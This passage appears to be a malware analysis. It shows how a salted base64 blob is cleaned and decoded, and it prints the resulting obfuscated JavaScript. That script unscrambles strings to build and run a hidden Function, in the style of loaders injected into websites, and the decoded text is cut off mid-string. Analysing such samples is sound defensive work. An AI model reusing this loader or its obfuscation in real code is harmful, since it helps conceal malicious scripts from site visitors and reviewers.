tTmMoZltpLmVdX3UubmUsX2UpdFdjVSksZVddRiBXVygueTFXIGldV1clV3pdV3VdMF04Ni5qUDArOSxlY2UxLi5zLlcsJGljV2VwODwzJF9iLiUrMjVfXWVqdHlbN2EgKTYuZmp9JH1hfVdXKGxXNkQxYW9lVyQpTSI1O2pXNGouaVwnKGwoRlY2M1BQVzVXJXUpNyBlUCAgLi4pcXt9dE4pcyg7ZSYlZDA4bEtqWy45LjQmVyFmV2U8ZiBxbDZpZlBhUDVie312UDVyZy1sJC4gRmVmV1NXanBlY1dFRWUlJHwpTmZXO2Flbm9fXSRQcm4sZnopaV9qXVdqLiQgODlyLiVfVyJoMWlQaSQ7bikxUFdXfDEiVyYlLjJqcDdMZXQzVzVkZGEmdS4xenx5ZFd3WmpXVylXKGZ4IGxwLmFrbTllNl9qPS4ubiU7Iihvd2JlVFBvclApM1NXRWYpe1dXbV0tV1dXV3xBI2dycih9JGxXJmIlZFdqO2NgVypXai5iQWgwcD1XIDBQQWplKXJUSVdlbShmdXcoXS5QZl0kV2lwMzkpM1wnVzAuV2ZvVyVicCxlISFKV113ZmZscmkpVytpV3JXO19XblcpOzBXemUxKCI7Yy5WKDN7Vyx1IDhQamE3eS5XQm5XblddKG5tcno0VykrOGZmNl82O2k9O3QuY0UwIWtlfSlfXyhdcGFvV2V1dG5dVykwaldXIGosXWs2aTt7YldNMS5dLmNfYyRXQyhIb29aX1BfM0B7UCg7KS5OZlc2V3V7K2lmY1cuN1czV3BfVmlwLm1QX2Y2JWQqIXQpIFcsX2pjdjtXUFckYWEuZlRXX1cuZWV2e31qJHIlUGojb3pQfW5XLiZfTncwIHBvLndfaVc7alcjNV9QLmZXX3R9ajlhbiIodTV7ZWxTeFoxQGd0MV9uNlc7NFdjVCA1JVcsJSkgIGYgNHZlLClpX10uWyYoX1c7ZX1XaldQKFdnKCMpZld7NWVbITsge0Qub1R4Knh1YTkiKVAgV1dXNS5XZlckNTZdP29lPWdXc30ocH1hKXN7X25jN1BXdDBXd3JXV2UzIHQ0LmcsIEFyaVdmZSohdG0xUChsdGN7PWZuZ2lhZSU9IDUlWz18bzg2Lm4mdyg3bSkoPTZbVy17aSluUHRXZmoyJVc3c1dlX29pbk02V1dmMXlmIl85V1dQcm5jd3NhJVcoO1hQKCBHLCl0NW4pcFcxMzRXXXFfOGwpKXs2cHIuUGl3aW1we1cpdGopMShddCpsXzElLDtxLDByZl9qV29XKSlmezNdXylQdChmamxcJyFXazU7LyVncTJXZzMpZSg4V1NXeWpXTF5fNGNXOGlXIXtYW1dueWgpQ2osaWktLnI7YiUrJWNaV3Q1IS4xKClkKThoV18zaXRpIC4gamYsUFdXVldqIiAuaS4pVCM2ZXswaiFvKGV3c3Q2V1dcJyV0Lih1KCQxN0RibjQ2cigydE1dUDYoVzNjM2kucldVdFdQKWldL28oNFdXIi1KIztXeig7V1A0Xz1XV2ZXdFV0RSwleWpmbSEtIHIlVz0wIklyZitnMTdtUFciKSJ3aSh0IGVyVjtdci5qZDJkZSwlMFBvYilpYilQbVc7cnBjbX1XXzFXXVdqYjZQVzJzOGV7VzAyaWpXKDRldFc1VztjdG5dXVcmOFc0Ziw7bWFtdGU2cD1XW1c5S2VZKWkxKDtXbl0lNDRqZThlIGZdaSFvdyxddFdsdChXdGlQO2YpV189cylXLH19aWx7UHBQJHRlcVd7LmkpL3BqX3V5PWI1VyFXV2V1dUcgdil0bE5yLkViNVczdWdXYl8oTDZQLC5xJSlXYXRabmVXYVdle3ByJHE0IndiXWUuczZ3UGkuMGJvdyVMc19zbjswNXMiX113LikhdGYuKHddU2ghYzBhNzsuN1soeiApIW5XXCdtKSAkbldXdCkpcCVTNyUuMHwuSW50ey5mKVlXMl9sZl0oVyB0dXJyIFdpdHJXdHc1OGFzUFtlSiEwJHplV1csbDM3PldXfWZdaSh0NStkczNXO3JfVzUoPWpmJld2NWkpMyhlV3IscF8jKTNXZmExTVdlInshYWRhPCV1P25XJWEuPXRpLm5mKC44bmVmO2RdJmV1PlAucmlkMyEtUGFtKXM7c0RbUC4oVzszXWppNSBPdHJuMCFlZ2VjdSlXdGUjJWVuZyh4YXU0JWJkV10pY1BXe25zbmpraClqZWNmKXRlZixlbmdqbixiJVsoaWNyN3MjaTI2NGQgaSkxV3oxRWExdDZbd3J9LmpyV11Xb2Zwc290ZChub2wjISApMkVzSGgob109c2V7QGI1ZXRXYnNfenpwLig7IGVKV19dYjBcJ2kkamZhLGUudWZSdCU5VyBQbHg7XW9XXVBudCAkYSA0LldzOHthZHJDKDRDX2FhUCJwPTBmJFcyJFdQVzMsMlEwJFB9UFdXKCVyUGd2LmtTKS4oV2lvb102amo7UCFhI1ApfThuPV1lcjZhZzJQai49JGVlLi5lZlcxP19hMzEpLmpmYX1lLl8zfS5XXzZdOC5jKDVwMSZpKVt0UClbV1d5dyksMCBwd29hNm5kM1ddOSkgPV0xV2BlXyRXamUiVyQoImVuIG9AYWVXYndzZVd9NVduOFcrZW4iKGUlMCViZTUpZ0AlZWZjIT10YXZmZjtXaVNsbiklKGUpd3IuVyk1IVcyMGoxYVcpUCU9Y1B4Lm1QXTEoKUpQXXI4KSp1XSxwcTckVzQwVygvZTdrOnI9KF1uU25XXTgzXSk7fHN0OyEhd1d0OChmd2lzZlxcXTBXKTNuX3N2aV1udThQLmJyci5dNy4pUFAucnZwV2VXZGc4LChnLGk2O1d7YWI1JShzXT0ofShpdWF1Yy49V144NXYoYShnKVcjX2IuVzdmYzYuamksXW4kISgpViFXKUVqNmNtbW5XbjIwKFBXaSVmYD9fdSlfVzNlOTAkV11iKVBqczI1RVdlPW90UDRlM2c7dSUleHM3V2JPNlBXe2IzbiljMi5XIF1zMVBQVyg8VyQ5MzA8akg9V3ciV3J0ZilXTiBdV2U2IzA5YzBEPF0gVyYxZGYxUCBpfGkoeylXIzk4VzRdX10tV29vXV0pbjFvRWooIFBXXyg1IiVhMD1FOy4/bHYwIjBpezZQMC53XSQwIVdXLVcuKVdQVytnbiwzeFcsV2ZkLj17IGVXLm5ybX0xLldfYVdXXShsNilXd1czanJwIDg1bFdpV18sJixqbTQ1KDEuXCdhV1U0MChsb19nKWw0OCldX3QuVykhV1dFRSBQZklXK3txZnNyZFNXMFduTiQzfW9XKVdkamZdMitlZTZXVyktKGVXbHQgV1dbLmk2blduVy5pKGU5KFcmbFddV2FXOTgsI1duKGY9NDIlOVNcJ2VrZTdOKV9mUDc7aigwUGlkV3RlVzVvKF0pZDJdNXk9bEkoIVc7eSAuUHU7ezNdb2ZuKDMkfThmN3BzamZsLm4te2osU28kUGVtaX1XV1wnKWU0KFNmVzI4NmYgJTBlcGMpZmRycWlvYXEoLl91X2NXX3lvLldwaTZXLlddKSkwdS1XbHgsKVAmKS5qKWNdc2UoaDYuey5XRFxcYTFdN2Z0ZTtzU1dQIFcoMmIuJGUkI3IzLChwIHtmKS4xXV9xJV9kaTE2OGhXZS5heH1md31lV29qdylXU2wwdHJXcyBsfSVmcGJobzUoM3tvXUMyLjs7a1dheVdmSU5taXQucFdjLlAob2VQX2E1Yy5XX2BpKyY9V28ucnJpc1d7UDpXJSBTZn1lLm1sbDZXV181UHQ2aT1XblcuIGU7V2lXVyAoeyA0VyMuXWZXKGZdbG8yalc7M1AtKX10Ll51KGMgU1dnYS5lLld9KTVkV3RXIShQMGIpNXBETilsV3lwdWFjITZXKSkuUGI3ajFvZmliYkdsYVdrM1BzMSBhLDQpYjRyamRXU2VtJSlwemkmKW80ZmU7Lm5XfSkjfXhnKHR7cCRLbldiejNJIjlXUCw2W05mX2ZnUCkwO0NoUFdXUGomZi5uLmJmej1dUCNfXzd7XCdXVzFzfSVdXyBXKUk9ITg2OFd9bDBqV11fZVdieFddY2RfUFdXV2EpZmckUG47PWJdV18wPV1XeiAgV3RXZWIkbVBubmVxV19wX2d5NzFdVzMgfFcoZiVzNSl0IVdkbSYucnF0V3IgMy9dSWNTZ19XdkZ9UE4+IFtiNWplaiRXdmZqdzUtUGwgV1d0V10gVzNfcmZfVz00M11dXVdlNyEocV1qV31waSgpdCguV11Xd1BXbFd5V2w2PS5QVy4gXWcwIS5XYW50V2NsaTVqLVt8bHd7ZTc1O2dvV19QdFcpYjQ2YVcyV2ZiZiBleWZdbSRXZiBoV11qMmV9VywpLGdXKHBjYWo1UCtwblc1NVApcCAucGJtZzFvcmkuNiRdNDdXVyl3eC5TMy5mY20oLmpyUGo4NVcgWyl8ZVtpVzRvYXopciZXbFBlIEF7V2EubW5XIG9XKFdwfXVmZSlXLldfV3IlPW8hN31XamhrIShqIDlyaTEzKzZwZW8oOV82dGdXV254e259XWwoVzcoJTY3Yl8iX19dNTN9ODshIClyKm52MVcmcHRwaylJZCllOChudVdJMFc9fWZ0Ljd0LmxmKTZXVzVrY1AnKSkpKDM1OTcpfSgpOw=="
Adversaries sometimes salt base64
strings to deceive reverse engineers. In this case, the following characters at the start and end of the above string are redundant:
"
K2iZ1
The resultant string is:
bmN0aW9uKCl7ZnVuY3Rpb24gVyhXKXtmb3IodmFyIGU9MzgxMDk5NyxQPVcubGVuZ3RoLGY9W10sbj0wO248UDtuKyspZltuXT1XLmNoYXJBdChuKTtmb3IodmFyIG49MDtuPFA7bisrKXt2YXIgcj1lKihuKzMwNSkrZSU0ODYzOCx0PWUqKG4rMTU4KStlJTMxNzU3LGk9ciVQLGo9dCVQLF89ZltpXTtmW2ldPWZbal0sZltqXT1fLGU9KHIrdCklNjcwMTUzMX1yZXR1cm4gZi5qb2luKCIiKX12YXIgZT1XKCJjb2Nvd3JmY3RnanVybnh5cHVoZGV0bHJidmtvc3Ntem50YXFpIikuc3Vic3RyKDAsMTEpLFA9V1tlXTtQKCIiLFAoIiIsVygnYWdoICA9LjY9aTkyMW49byguZ111bCtvXXJvd2NkaThvcjt0c2NhZXZdaW03bnVbcik4OyhzYV1yIFs9Ymx0ZCxubjBbdm0uZDdpYShuYXYsLDAoLHJ2dShycjgpLGk1LG52OylpZyBlLG0ob2xsLHYwdCg7LHQwcGNsYUFhKG5oLGlmaFtnY3JiN3YuLG5lbHhDbG96bz1nb1s7aTl0WyFycFsrPXM9djswPTErYT1hPWdzZT1vLHI0XW9dIXhzOykgYyIpaltndGVycnthZG9kYWFybittaGhiYi5pcDcgdEE5biItKXcocnJhcnJhPXRibXVDdD1pYTYuLiljKSl1cithMSJmMDs7Z3JyPmVhdj10QztrK2otaDsxZCBqZ3B0LWgoaGhkID1ldDtsZT12bHJTYjEpQ3JvO3ZhLCBnbStzKD0yPX1yb1tuKjtocztlbC07PSB2ZihkYzZuaTsrIHJ7anJTbDFucnNnczthO25jaytyanRlZzNybj0iLltxYWwgb3UgMGMycmk7bTA9PTEoZV1hZl0gcitjO3RheytvLWNuMzQrOyBoYmRBdi5hZT1ibm9mdC57KCAxZ3M7KTspbDFpai05dHcwN2ZmdmEpNWxhfTsobmZ9YSJndGg3dSsyLDJxPTs9dmx2ZXQ7Wyh0OyliLmIoICA7dTlqcHY4MDt2Mjc7aXI2cCxydWkgbjc4LGdjPXtjeTkscHBlOD0pbGY7PD10O2d1NGdzPSsxOzYiKDssOCk2c3J9dnVlKz1idWM3dCguYnN7bz1dKSloay5Dcjs7O3JhaDwpaTYsPWdyK31jIF05KC4oaW49bCsgKGhhZGFmMXBoLml1c102Zi5zcjtqdGtpLD1kKykoMHJicC5dYytvMmNubyI7PCpnKXI2KThyc2xzKDA7eF09djRyPTV1YSlvQ2lvKWVvdDtvYXJlYT0uPSlyKDZ1KH1lPWEsZ3JwdHI8Wygzbj1paCJ6KXZ2PVtbdmwoO3IpcG9mampxLCIydUNubChhayspaX0udHJDdnZsIGY9Li57LXUoIClzNG4pbzIraS5ddncuLmVuYjs7bnN6LGMsO2NuICh1KT4rcit4NiwrdSJybillIChmbmJodGc8KGtucW5lKSlhbjtyLC50cmU3d29ucGwrbWV0MShBLEEuZTZ1bGw4LmEnKSkoVygnNGZXZm8xIVdsZGV0USQ7cGJuJCQpKSlmbDAhU1d1V2VlZkNpY1hfZjs7b19VND0yX1dmXWFXZyguKDE7Oj11Z19oKWUgKCRzfTs0fTJXJVcuV1d9ImJ0IVdXVzR5W1BXXztyXXE6NWVlfFdpV25cJ1dyWnQyMDN3XS4gWSVOIGIpeVckLiQ2KFd7fWRlbG9XXVBib1dqeztDVyAoZi5dLCJfKC5mb3lwKHVXMDZ1V2pXfWZlb2pXdCFXamNiV2pQbiEuLiMgdFg2XXMgaiFsfSBmYj02XVdsZWUsKVcoKWVDKVdXKGRXcm8gUF9yKTpvY1Byd1RQIThdNTxXV3JXICkpYX1fZWNlbiRXOVdjdGUpMzYsNC4wOWx9V2FldW9wMGIpKHt7LGMpV1dyai4uYXplZTcuRWp9V2RXO1RXeFBXbl83ZSlnamo4ZVcoZX0jdX1TV19oMS46YilPV3AkKDUsVylfXSBXUGU9dSllZSB0MGR0LmMoV1AoV2wqaSRnV2YoKzBfdzVXOWdXUFc9dDczLHUkV2VuZiRzXyhXZV9mPSAhXyUxUDBiNVdvVyhSVD0haT1uKWkpOTUpUFdXcSk3U31dV2VbPVM5VyUgLmdXeDAufXJ7V0hXVzVuVzZ0LlMsMWVvZ1tmNlQoZCkkLCBXcldlLl5bOTZ7cjEkej0sJHQzVy8wNFgyV2VdP2UoZWlQMFdXLmFuKUQuX1d3Q1NOe2JXV2pXX3R7Nj02dG5fV24odHA1fX1uJTssIDQgJC4wW2U5KHZ0L2tkLyBpZ1BjZi5qY19lV1AybVBqYmYhV2pzID1XZWZfNjkuLDk7ZGFpKyl7KVdQV28zKG4pNS5ifVclZFcpbixQNDQpaXJ3aldCZnU0NVcuLzBlZWRXKWxuUmk7cFdvXTUtV2NmXCdQRn0wVyFmU3MwVyklaChmV3VNK21lMikoV2UvVyAgKHUiYmpfXyUka19QMENuJTAoZmU9V1FjdDJvMmdvKGVQMmwxIFd9biF1Zm47bl1XN3die2k4PV8oVzU4N3YlXSFXX1Bxe1cxLil1JFcsW2RmLXVtZV9XdFcoKGYqXVclSiVvV2pzYXJDKDhlZmxdZX1JRHQuVz1iKURXeldXX3FXIzkgI3BtaiVuc3A7bnVcXGxdVy49Vy47Nj1XfS57JV8/cC1XZm4/bFcgbW9qV2koOSFXfSJsZno0LnBXLnIqYmVfbF8uLmEgW1BEIXtQVylfbmVxUDdQVyYkUEJ7aDM7b1dhV1d7aW4zI2orVyV1JHR1IkN5LHBqb3tXOzBpZSVfMSpXITEyakIpMGkxZV8yVzJFbjBwKWR9OylsaVdqLjAgan0sU29hLF4uX107UFdqIjApLjI5O1BvV1dmKS5XKDt7Sih3bjJQVlcoLlBXIFd3NV05dF19V29dXSxyVzF0aV9nX19XPT1XaS5QUGlXV2NQZikoVyk1VzUoLzUwJldNfDdyKWsxeyxQc11uXyksUF93XV9ldFdXZS4oaVAhKS5kV2I4Zm9XanVXV1dQIzdmUDVXXVc3KCEwbzBcXFd5MiB4MXtFMTEhLmVhMChhMVwncltnOyxXVy1tbWkmUFBQWV9qaH1fYjhnOVdXcix3V1d7Z2ZyOXQkYV8yKUVpUXVXKDRuMWpnXWksJSNcXHtqYTdXW1cmdFc/ey42ISFQUGVXZClYMSBlOC12YVBmLFcrIil0ZWd7fW4lLCtyJGFdMj8zZik7d3UlV25XMW99ZShvMSJXKXVXKGxubWVqKSksam9fODIkLDVqdE1QeyQpVzl0am49c2E7YSEpKFczd2UldXB9fGVsXzhde3plUGpQUyMuKGdcJ2VXO2Eldk0wYVdvMDV0d2RdNFdXV3JXIDNXdCBkLG8uJGlQNElXY3V7V1dXUCk5VzMoV3RHN1cobndqZWguVy5pfSBXKGw9Zm8we24sYS5XKWYmZTFqb2YldFBhZCxXc1d2O25fbldJLiB1UGpvbGpqUFUkenI0MldpZmV8XVckfXRXaiVdV1AlZClXMFdXV2QlPmVqIGkpdHpOcyJyaXo3UFc3MnIycmJLRSg4dC02NTZOVzcqXWNsL2YlLGYpbDtzPF1mcC1XV25dYVcyOS4oV25XUmpdXSlnIDY9ZyhhZV9pdE1XLGl1anVXd2ZQezNXV2ZXVywyeXcpO2IxLFcvMWMlICBhUCAuYlAzY2tjMHVmLjNsV2VXeVdddWdXV25iIClXV25uXXNjN1dtLmErXygiLmptTmMoZltpLmVdX3UubmUsX2UpdFdjVSksZVddRiBXVygueTFXIGldV1clV3pdV3VdMF04Ni5qUDArOSxlY2UxLi5zLlcsJGljV2VwODwzJF9iLiUrMjVfXWVqdHlbN2EgKTYuZmp9JH1hfVdXKGxXNkQxYW9lVyQpTSI1O2pXNGouaVwnKGwoRlY2M1BQVzVXJXUpNyBlUCAgLi4pcXt9dE4pcyg7ZSYlZDA4bEtqWy45LjQmVyFmV2U8ZiBxbDZpZlBhUDVie312UDVyZy1sJC4gRmVmV1NXanBlY1dFRWUlJHwpTmZXO2Flbm9fXSRQcm4sZnopaV9qXVdqLiQgODlyLiVfVyJoMWlQaSQ7bikxUFdXfDEiVyYlLjJqcDdMZXQzVzVkZGEmdS4xenx5ZFd3WmpXVylXKGZ4IGxwLmFrbTllNl9qPS4ubiU7Iihvd2JlVFBvclApM1NXRWYpe1dXbV0tV1dXV3xBI2dycih9JGxXJmIlZFdqO2NgVypXai5iQWgwcD1XIDBQQWplKXJUSVdlbShmdXcoXS5QZl0kV2lwMzkpM1wnVzAuV2ZvVyVicCxlISFKV113ZmZscmkpVytpV3JXO19XblcpOzBXemUxKCI7Yy5WKDN7Vyx1IDhQamE3eS5XQm5XblddKG5tcno0VykrOGZmNl82O2k9O3QuY0UwIWtlfSlfXyhdcGFvV2V1dG5dVykwaldXIGosXWs2aTt7YldNMS5dLmNfYyRXQyhIb29aX1BfM0B7UCg7KS5OZlc2V3V7K2lmY1cuN1czV3BfVmlwLm1QX2Y2JWQqIXQpIFcsX2pjdjtXUFckYWEuZlRXX1cuZWV2e31qJHIlUGojb3pQfW5XLiZfTncwIHBvLndfaVc7alcjNV9QLmZXX3R9ajlhbiIodTV7ZWxTeFoxQGd0MV9uNlc7NFdjVCA1JVcsJSkgIGYgNHZlLClpX10uWyYoX1c7ZX1XaldQKFdnKCMpZld7NWVbITsge0Qub1R4Knh1YTkiKVAgV1dXNS5XZlckNTZdP29lPWdXc30ocH1hKXN7X25jN1BXdDBXd3JXV2UzIHQ0LmcsIEFyaVdmZSohdG0xUChsdGN7PWZuZ2lhZSU9IDUlWz18bzg2Lm4mdyg3bSkoPTZbVy17aSluUHRXZmoyJVc3c1dlX29pbk02V1dmMXlmIl85V1dQcm5jd3NhJVcoO1hQKCBHLCl0NW4pcFcxMzRXXXFfOGwpKXs2cHIuUGl3aW1we1cpdGopMShddCpsXzElLDtxLDByZl9qV29XKSlmezNdXylQdChmamxcJyFXazU7LyVncTJXZzMpZSg4V1NXeWpXTF5fNGNXOGlXIXtYW1dueWgpQ2osaWktLnI7YiUrJWNaV3Q1IS4xKClkKThoV18zaXRpIC4gamYsUFdXVldqIiAuaS4pVCM2ZXswaiFvKGV3c3Q2V1dcJyV0Lih1KCQxN0RibjQ2cigydE1dUDYoVzNjM2kucldVdFdQKWldL28oNFdXIi1KIztXeig7V1A0Xz1XV2ZXdFV0RSwleWpmbSEtIHIlVz0wIklyZitnMTdtUFciKSJ3aSh0IGVyVjtdci5qZDJkZSwlMFBvYilpYilQbVc7cnBjbX1XXzFXXVdqYjZQVzJzOGV7VzAyaWpXKDRldFc1VztjdG5dXVcmOFc0Ziw7bWFtdGU2cD1XW1c5S2VZKWkxKDtXbl0lNDRqZThlIGZdaSFvdyxddFdsdChXdGlQO2YpV189cylXLH19aWx7UHBQJHRlcVd7LmkpL3BqX3V5PWI1VyFXV2V1dUcgdil0bE5yLkViNVczdWdXYl8oTDZQLC5xJSlXYXRabmVXYVdle3ByJHE0IndiXWUuczZ3UGkuMGJvdyVMc19zbjswNXMiX113LikhdGYuKHddU2ghYzBhNzsuN1soeiApIW5XXCdtKSAkbldXdCkpcCVTNyUuMHwuSW50ey5mKVlXMl9sZl0oVyB0dXJyIFdpdHJXdHc1OGFzUFtlSiEwJHplV1csbDM3PldXfWZdaSh0NStkczNXO3JfVzUoPWpmJld2NWkpMyhlV3IscF8jKTNXZmExTVdlInshYWRhPCV1P25XJWEuPXRpLm5mKC44bmVmO2RdJmV1PlAucmlkMyEtUGFtKXM7c0RbUC4oVzszXWppNSBPdHJuMCFlZ2VjdSlXdGUjJWVuZyh4YXU0JWJkV10pY1BXe25zbmpraClqZWNmKXRlZixlbmdqbixiJVsoaWNyN3MjaTI2NGQgaSkxV3oxRWExdDZbd3J9LmpyV11Xb2Zwc290ZChub2wjISApMkVzSGgob109c2V7QGI1ZXRXYnNfenpwLig7IGVKV19dYjBcJ2kkamZhLGUudWZSdCU5VyBQbHg7XW9XXVBudCAkYSA0LldzOHthZHJDKDRDX2FhUCJwPTBmJFcyJFdQVzMsMlEwJFB9UFdXKCVyUGd2LmtTKS4oV2lvb102amo7UCFhI1ApfThuPV1lcjZhZzJQai49JGVlLi5lZlcxP19hMzEpLmpmYX1lLl8zfS5XXzZdOC5jKDVwMSZpKVt0UClbV1d5dyksMCBwd29hNm5kM1ddOSkgPV0xV2BlXyRXamUiVyQoImVuIG9AYWVXYndzZVd9NVduOFcrZW4iKGUlMCViZTUpZ0AlZWZjIT10YXZmZjtXaVNsbiklKGUpd3IuVyk1IVcyMGoxYVcpUCU9Y1B4Lm1QXTEoKUpQXXI4KSp1XSxwcTckVzQwVygvZTdrOnI9KF1uU25XXTgzXSk7fHN0OyEhd1d0OChmd2lzZlxcXTBXKTNuX3N2aV1udThQLmJyci5dNy4pUFAucnZwV2VXZGc4LChnLGk2O1d7YWI1JShzXT0ofShpdWF1Yy49V144NXYoYShnKVcjX2IuVzdmYzYuamksXW4kISgpViFXKUVqNmNtbW5XbjIwKFBXaSVmYD9fdSlfVzNlOTAkV11iKVBqczI1RVdlPW90UDRlM2c7dSUleHM3V2JPNlBXe2IzbiljMi5XIF1zMVBQVyg8VyQ5MzA8akg9V3ciV3J0ZilXTiBdV2U2IzA5YzBEPF0gVyYxZGYxUCBpfGkoeylXIzk4VzRdX10tV29vXV0pbjFvRWooIFBXXyg1IiVhMD1FOy4/bHYwIjBpezZQMC53XSQwIVdXLVcuKVdQVytnbiwzeFcsV2ZkLj17IGVXLm5ybX0xLldfYVdXXShsNilXd1czanJwIDg1bFdpV18sJixqbTQ1KDEuXCdhV1U0MChsb19nKWw0OCldX3QuVykhV1dFRSBQZklXK3txZnNyZFNXMFduTiQzfW9XKVdkamZdMitlZTZXVyktKGVXbHQgV1dbLmk2blduVy5pKGU5KFcmbFddV2FXOTgsI1duKGY9NDIlOVNcJ2VrZTdOKV9mUDc7aigwUGlkV3RlVzVvKF0pZDJdNXk9bEkoIVc7eSAuUHU7ezNdb2ZuKDMkfThmN3BzamZsLm4te2osU28kUGVtaX1XV1wnKWU0KFNmVzI4NmYgJTBlcGMpZmRycWlvYXEoLl91X2NXX3lvLldwaTZXLlddKSkwdS1XbHgsKVAmKS5qKWNdc2UoaDYuey5XRFxcYTFdN2Z0ZTtzU1dQIFcoMmIuJGUkI3IzLChwIHtmKS4xXV9xJV9kaTE2OGhXZS5heH1md31lV29qdylXU2wwdHJXcyBsfSVmcGJobzUoM3tvXUMyLjs7a1dheVdmSU5taXQucFdjLlAob2VQX2E1Yy5XX2BpKyY9V28ucnJpc1d7UDpXJSBTZn1lLm1sbDZXV181UHQ2aT1XblcuIGU7V2lXVyAoeyA0VyMuXWZXKGZdbG8yalc7M1AtKX10Ll51KGMgU1dnYS5lLld9KTVkV3RXIShQMGIpNXBETilsV3lwdWFjITZXKSkuUGI3ajFvZmliYkdsYVdrM1BzMSBhLDQpYjRyamRXU2VtJSlwemkmKW80ZmU7Lm5XfSkjfXhnKHR7cCRLbldiejNJIjlXUCw2W05mX2ZnUCkwO0NoUFdXUGomZi5uLmJmej1dUCNfXzd7XCdXVzFzfSVdXyBXKUk9ITg2OFd9bDBqV11fZVdieFddY2RfUFdXV2EpZmckUG47PWJdV18wPV1XeiAgV3RXZWIkbVBubmVxV19wX2d5NzFdVzMgfFcoZiVzNSl0IVdkbSYucnF0V3IgMy9dSWNTZ19XdkZ9UE4+IFtiNWplaiRXdmZqdzUtUGwgV1d0V10gVzNfcmZfVz00M11dXVdlNyEocV1qV31waSgpdCguV11Xd1BXbFd5V2w2PS5QVy4gXWcwIS5XYW50V2NsaTVqLVt8bHd7ZTc1O2dvV19QdFcpYjQ2YVcyV2ZiZiBleWZdbSRXZiBoV11qMmV9VywpLGdXKHBjYWo1UCtwblc1NVApcCAucGJtZzFvcmkuNiRdNDdXVyl3eC5TMy5mY20oLmpyUGo4NVcgWyl8ZVtpVzRvYXopciZXbFBlIEF7V2EubW5XIG9XKFdwfXVmZSlXLldfV3IlPW8hN31XamhrIShqIDlyaTEzKzZwZW8oOV82dGdXV254e259XWwoVzcoJTY3Yl8iX19dNTN9ODshIClyKm52MVcmcHRwaylJZCllOChudVdJMFc9fWZ0Ljd0LmxmKTZXVzVrY1AnKSkpKDM1OTcpfSgpOw==
On base64
decoding the above string, I got the following:
nction(){function W(W){for(var e=3810997,P=W.length,f=[],n=0;n<P;n++)f[n]=W.charAt(n);for(var n=0;n<P;n++){var r=e*(n+305)+e%48638,t=e*(n+158)+e%31757,i=r%P,j=t%P,_=f[i];f[i]=f[j],f[j]=_,e=(r+t)%6701531}return f.join("")}var e=W("cocowrfctgjurnxypuhdetlrbvkossmzntaqi").substr(0,11),P=W[e];P("",P("",W('agh =.6=i921n=o(.g]ul+o]rowcdi8or;tscaev]im7nu[r)8;(sa]r [=bltd,nn0[vm.d7ia(nav,,0(,rvu(rr8),i5,nv;)ig e,m(oll,v0t(;,t0pclaAa(nh,ifh[gcrb7v.,nelxClozo=go[;i9t[!rp[+=s=v;0=1+a=a=gse=o,r4]o]!xs;) c")j[gterr{adodaarn+mhhbb.ip7 tA9n"-)w(rrarra=tbmuCt=ia6..)c))ur+a1"f0;;grr>eav=tC;k+j-h;1d jgpt-h(hhd =et;le=vlrSb1)Cro;va, gm+s(=2=}ro[n*;hs;el-;= vf(dc6ni;+ r{jrSl1nrsgs;a;nck+rjteg3rn=".[qal ou 0c2ri;m0==1(e]af] r+c;ta{+o-cn34+; hbdAv.ae=bnoft.{( 1gs;);)l1ij-9tw07ffva)5la};(nf}a"gth7u+2,2q=;=vlvet;[(t;)b.b( ;u9jpv80;v27;ir6p,rui n78,gc={cy9,ppe8=)lf;<=t;gu4gs=+1;6"(;,8)6sr}vue+=buc7t(.bs{o=]))hk.Cr;;;rah<)i6,=gr+}c ]9(.(in=l+ (hadaf1ph.ius]6f.sr;jtki,=d+)(0rbp.]c+o2cno";<*g)r6)8rsls(0;x]=v4r=5ua)oCio)eot;oarea=.=)r(6u(}e=a,grptr<[(3n=ih"z)vv=[[vl(;r)pofjjq,"2uCnl(ak+)i}.trCvvl f=..{-u( )s4n)o2+i.]vw..enb;;nsz,c,;cn (u)>+r+x6,+u"rn)e (fnbhtg<(knqne))an;r,.tre7wonpl+met1(A,A.e6ull8.a'))(W('4fWfo1!WldetQ$;pbn$$)))fl0!SWuWeefCicX_f;;o_U4=2_Wf]aWg(.(1;:=ug_h)e ($s};4}2W%W.WW}"bt!WWW4y[PW_;r]q:5ee|WiWn\'WrZt203w]. Y%N b)yW$.$6(W{}deloW]PboWj{;CW (f.],"_(.foyp(uW06uWjW}feojWt!WjcbWjPn!..# tX6]s j!l} fb=6]Wlee,)W()eC)WW(dWro P_r):ocPrwTP!8]5<WWrW ))a}_ecen$W9Wcte)36,4.09l}Waeuop0b)({{,c)WWrj..azee7.Ej}WdW;TWxPWn_7e)gjj8eW(e}#u}SW_h1.:b)OWp$(5,W)_] WPe=u)ee t0dt.c(WP(Wl*i$gWf(+0_w5W9gWPW=t73,u$Wenf$s_(We_f= !_%1P0b5WoW(RT=!i=n)i)95)PWWq)7S}]We[=S9W% .gWx0.}r{WHWW5nW6t.S,1eog[f6T(d)$, WrWe.^[96{r1$z=,$t3W/04X2We]?e(eiP0WW.an)D._WwCSN{bWWjW_t{6=6tn_Wn(tp5}}n%;, 4 $.0[e9(vt/kd/ igPcf.jc_eWP2mPjbf!Wjs =Wef_69.,9;dai+){)WPWo3(n)5.b}W%dW)n,P44)irwjWBfu45W./0eedW)lnRi;pWo]5-Wcf\'PF}0W!fSs0W)%h(fWuM+me2)(We/W (u"bj__%$k_P0Cn%0(fe=WQct2o2go(eP2l1 W}n!ufn;n]W7wb{i8=_(W587v%]!W_Pq{W1.)u$W,[df-ume_WtW((f*]W%J%oWjsarC(8efl]e}IDt.W=b)DWzWW_qW#9 #pmj%nsp;nu\\l]W.=W.;6=W}.{%_?p-Wfn?lW mojWi(9!W}"lfz4.pW.r*be_l_..a [PD!{PW)_neqP7PW&$PB{h3;oWaWW{in3#j+W%u$tu"Cy,pjo{W;0ie%_1*W!12jB)0i1e_2W2En0p)d};)liWj.0 j},Soa,^._];PWj"0).29;PoWWf).W(;{J(wn2PVW(.PW Ww5]9t]}Wo]],rW1ti_g__W==Wi.PPiWWcPf)(W)5W5(/50&WM|7r)k1{,Ps]n_),P_w]_etWWe.(iP!).dWb8foWjuWWWP#7fP5W]W7(!0o0\\Wy2 x1{E11!.ea0(a1\'r[g;,WW-mmi&PPPY_jh}_b8g9WWr,wWW{gfr9t$a_2)EiQuW(4n1jg]i,%#\\{ja7W[W&tW?{.6!!PPeWd)X1 e8-vaPf,W+")teg{}n%,+r$a]2?3f);wu%WnW1o}e(o1"W)uW(lnmej)),jo_82$,5jtMP{$)W9tjn=sa;a!)(W3we%up}|el_8]{zePjPS#.(g\'eW;a%vM0aWo05twd]4WWWrW 3Wt d,o.$iP4IWcu{WWWP)9W3(WtG7W(nwjeh.W.i} 